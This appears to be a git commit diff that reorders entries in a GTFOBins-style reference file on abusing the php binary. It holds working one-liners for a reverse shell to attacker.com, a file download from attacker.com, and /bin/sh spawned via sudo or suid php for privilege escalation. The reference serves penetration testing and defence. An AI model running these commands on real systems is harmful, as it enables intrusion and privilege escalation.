Reorder functions in binaries

2025-09-21 07:39:29 +02:00 · 2018-07-04 19:26:52 +01:00
parent 80b20b6991
commit d6895f367d
81 changed files with 1171 additions and 1123 deletions
--- a/_gtfobins/php.md
+++ b/_gtfobins/php.md
@@ -17,33 +17,34 @@ functions:
      export CMD="/bin/sh"
      php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
  execute-non-interactive:
-    - code: |
-        export CMD="id"
-        php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
-  sudo-enabled:
-    - code: |
-        CMD="/bin/sh"
-        sudo php -r "system('$CMD');"
-  suid-enabled:
-    - code: |
-        CMD="/bin/sh"
-        ./php -r "system('$CMD');"
-  upload:
-    - description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
-      code: |
-        LHOST=0.0.0.0
-        LPORT=8888
-        php -S $LHOST:$LPORT
-  download:
-    - description: Fetch a remote file via HTTP GET request.
-      code: |
-        export URL=http://attacker.com/file_to_get
-        export LFILE=file_to_save
-        php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
+  - code: |
+      export CMD="id"
+      php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
  reverse-shell-interactive:
-    - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
-      code: |
-        export RHOST=attacker.com
-        export RPORT=12345
-        php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
+  - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+    code: |
+      export RHOST=attacker.com
+      export RPORT=12345
+      php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
+  upload:
+  - description: Serve files in the local folder running an HTTP server. This requires
+      PHP version 5.4 or later.
+    code: |
+      LHOST=0.0.0.0
+      LPORT=8888
+      php -S $LHOST:$LPORT
+  download:
+  - description: Fetch a remote file via HTTP GET request.
+    code: |
+      export URL=http://attacker.com/file_to_get
+      export LFILE=file_to_save
+      php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
+  suid-enabled:
+  - code: |
+      CMD="/bin/sh"
+      ./php -r "system('$CMD');"
+  sudo-enabled:
+  - code: |
+      CMD="/bin/sh"
+      sudo php -r "system('$CMD');"
 ---